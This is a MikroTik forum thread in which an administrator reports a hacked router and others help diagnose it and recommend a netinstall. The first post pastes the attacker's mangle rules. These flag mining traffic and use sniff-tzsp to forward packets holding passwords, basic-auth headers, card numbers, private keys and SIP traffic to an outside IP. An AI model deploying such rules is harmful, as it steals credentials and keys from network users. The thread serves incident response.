Community discussions

 
mistry7
Forum Guru
Forum Guru
Topic Author
Posts: 1323
Joined: Tue Oct 13, 2009 11:57 am
Location: Germany

Hacked Board

Wed Jan 02, 2019 3:48 pm

Hi,

i found an hacked board running was on 6.43.2
I´dont now how this had worked, we use Firewall and winbox only responded to known IP (our IP´s)
All Services Ports are changed
ssh=62000
www-ssl=65002
api=64000
winbox=65000
api-all=63000


the wired think is, i have full rights but it is not possible ti change this ports via terminal, via winbox works.


@Mikrotik any idears?

/ip firewall mangle
add action=mark-connection chain=prerouting content=eth_submitWork new-connection-mark=Ethereum
add action=add-dst-to-address-list address-list=Ethereum chain=prerouting content=eth_submitWork
add action=fasttrack-connection chain=prerouting content=eth_submitWork
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" sniff-target=149.56.27.80 sniff-target-port=60000
add action=mark-connection chain=prerouting content=mining.submit new-connection-mark=Bitcoin
add action=add-dst-to-address-list address-list=Bitcoin chain=prerouting content=mining.submit
add action=sniff-tzsp chain=prerouting content="ccn=" sniff-target=149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content=privatekey sniff-target=149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" sniff-target=149.56.27.80 sniff-target-port=60000
add action=sniff-tzsp chain=prerouting content=json sniff-target=149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="passwd=" sniff-target=149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="password=" sniff-target=149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="pass=" sniff-target=149.56.27.80 sniff-target-port=60002
add action=fasttrack-connection chain=prerouting content=Bitcoin
add action=sniff-tzsp chain=prerouting dst-port=5060 protocol=tcp sniff-target=149.56.27.80 sniff-target-port=60003
add action=sniff-tzsp chain=prerouting dst-port=5060 protocol=udp sniff-target=149.56.27.80 sniff-target-port=60003
 
R1CH
Forum Veteran
Forum Veteran
Posts: 904
Joined: Sun Oct 01, 2006 11:44 pm

Re: Hacked Board

Wed Jan 02, 2019 5:49 pm

They have enabled packet sniffer to send all passwords, bitcoin private keys, etc to their server. You should format and netinstall with a known good config, once a board is compromised it cannot be safely restored from winbox / terminal alone since a root exploit could have been used.
 
pe1chl
Forum Guru
Forum Guru
Posts: 5912
Joined: Mon Jun 08, 2015 12:09 pm

Re: Hacked Board

Wed Jan 02, 2019 5:57 pm

Hi,

i found an hacked board running was on 6.43.2
I´dont now how this had worked, we use Firewall and winbox only responded to known IP (our IP´s)
There likely is some router on your network where such rules are not in place, it was infected too, and it spread the infection to other routers inside your network that are well protected from outside.
This is always a risk with attacks that themselves include spreading code that scans the connected networks.
 
mistry7
Forum Guru
Forum Guru
Topic Author
Posts: 1323
Joined: Tue Oct 13, 2009 11:57 am
Location: Germany

Re: Hacked Board

Wed Jan 02, 2019 6:31 pm

single router on single VDSL Connection, no other Mikrotik devices....
IP Filter for services is enabled since installation.....(2017)
 
User avatar
nickshore
Member
Member
Posts: 472
Joined: Thu Mar 03, 2005 4:14 pm
Location: Suffolk, UK.
Contact:

Re: Hacked Board

Wed Jan 02, 2019 6:48 pm

If services were available from the LAN, then an infected PC on the LAN could exploit the router from the LAN side.
Nick Shore MTCNA MTCWE MTCRE MTCINE MTCTCE
LinITX.com - MultiThread Consultants
Get your MikroTik RBs and Training: http://linitx.com/brand/mikrotik
Official UK MikroTik Distributor
IRC chan: #routerboard on irc.z.je (IPv4 and IPv6)
 
User avatar
sebastia
Forum Guru
Forum Guru
Posts: 1790
Joined: Tue Oct 12, 2010 3:23 am
Location: Antwerp, BE

Re: Hacked Board

Wed Jan 02, 2019 7:11 pm

But if it's 6.43.x how can it be exploited as to my knowledge there are no open security bugs?
 
User avatar
BartoszP
Forum Guru
Forum Guru
Posts: 1717
Joined: Mon Jun 16, 2014 1:13 pm
Location: Poland

Re: Hacked Board

Wed Jan 02, 2019 7:16 pm

Do you use same "paranoic" :D rules for LAN as for WAN side?
Real admins use real keyboards.
 
pe1chl
Forum Guru
Forum Guru
Posts: 5912
Joined: Mon Jun 08, 2015 12:09 pm

Re: Hacked Board

Wed Jan 02, 2019 7:41 pm

But if it's 6.43.x how can it be exploited as to my knowledge there are no open security bugs?
There was at least one open security bug (fixed in 6.43.8) that could be used when the password was known.
The password may have leaked earlier or using another mechanism.
 
mistry7
Forum Guru
Forum Guru
Topic Author
Posts: 1323
Joined: Tue Oct 13, 2009 11:57 am
Location: Germany

Re: Hacked Board

Wed Jan 02, 2019 7:55 pm

But if it's 6.43.x how can it be exploited as to my knowledge there are no open security bugs?
There was at least one open security bug (fixed in 6.43.8) that could be used when the password was known.
The password may have leaked earlier or using another mechanism.
Impossible, after Winbox hack, we changed all passwords on boards that directly connected to the Internet, we don’t use Passwords more then on one device
 
R1CH
Forum Veteran
Forum Veteran
Posts: 904
Joined: Sun Oct 01, 2006 11:44 pm

Re: Hacked Board

Thu Jan 03, 2019 12:25 am

Changing passwords is not enough, you MUST netinstall any compromised device!
 
mistry7
Forum Guru
Forum Guru
Topic Author
Posts: 1323
Joined: Tue Oct 13, 2009 11:57 am
Location: Germany

Re: Hacked Board

Thu Jan 03, 2019 2:06 am

Changing passwords is not enough, you MUST netinstall any compromised device!
This is first and only board I found.
We did update on all core routers in the same night the updates was available in the early morning all CPEs

We checked all login protocols (2weeks back) there was no login to our bords, no files no scripts nothing, and this board here, users begin complain speed on 31.12.2018, NoC was not able to login so Ticket for exchange was made, today we found this board with the config above, password was not changed, but ports (services) and firewall (filter / mangle), but our remote ip was still active in services (there are 4 iPs used)
 
User avatar
strods
MikroTik Support
MikroTik Support
Posts: 1409
Joined: Wed Jul 16, 2014 7:22 am
Location: Riga, Latvia

Re: Hacked Board

Thu Jan 03, 2019 7:00 am

mistry7 - Are you 100% sure that you changed all the passwords on your router for all the users configured on it? Are you 100% sure that passwords were changed after an upgrade to v6.43 not before that?
 
mistry7
Forum Guru
Forum Guru
Topic Author
Posts: 1323
Joined: Tue Oct 13, 2009 11:57 am
Location: Germany

Re: Hacked Board

Thu Jan 03, 2019 10:58 am

mistry7 - Are you 100% sure that you changed all the passwords on your router for all the users configured on it? Are you 100% sure that passwords were changed after an upgrade to v6.43 not before that?
One user only on all boards, yes in PW list change is Dokumented with date, and there are 3 updates done after, last update was from 6.43.2 to 6.43.8

I did Winbox connect before exchange (mac)
Export config and found changed thinks
Want to edit the service ports in terminal and it doesn’t work ( script that we use to secure all boards based on ip services and firewall)
There was no error, but the changes ports did not change

Manuell edit with Winbox worked
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24259
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Hacked Board

Thu Jan 03, 2019 10:59 am

The rules are the same that were added by the old hack/exploit script.
So 99.99% chance that these rules you had even before upgrade, and they kept sending the attacker your passwords, old and new, even after upgrade.

upgrading patches the vulnerability, it doesn't modify your config. if you had such config, upgrade would leave it.
No answer to your question? How to write posts
 
mistry7
Forum Guru
Forum Guru
Topic Author
Posts: 1323
Joined: Tue Oct 13, 2009 11:57 am
Location: Germany

Re: Hacked Board

Thu Jan 03, 2019 1:34 pm

The rules are the same that were added by the old hack/exploit script.
So 99.99% chance that these rules you had even before upgrade, and they kept sending the attacker your passwords, old and new, even after upgrade.

upgrading patches the vulnerability, it doesn't modify your config. if you had such config, upgrade would leave it.
But how is about the time line.

1. Update Board in the night of fixed release
2. Review config and change passwords (after hacked boards found around the world and possibility someone know the pw´s)
3. Board works fine for 5-6 Month
4. now with 6.43.2 found board with changed config, how they could know the password?


This script does not apply in terminal windows, nothing happens

/ip service
set telnet address=185.18.XX.XX
set ftp address=185.18.XX.XX
set www address=185.18.XX.XX
set ssh address=185.18.XX.XX
set api address=176.221.XX.XX/32
set winbox address=185.18.XX.XX
set api-ssl disabled=yes
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24259
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Hacked Board

Thu Jan 03, 2019 1:45 pm

Not sure this happened and did not leave some file or script in place:
2. Review config
No answer to your question? How to write posts

Who is online

Users browsing this forum: No registered users and 113 guests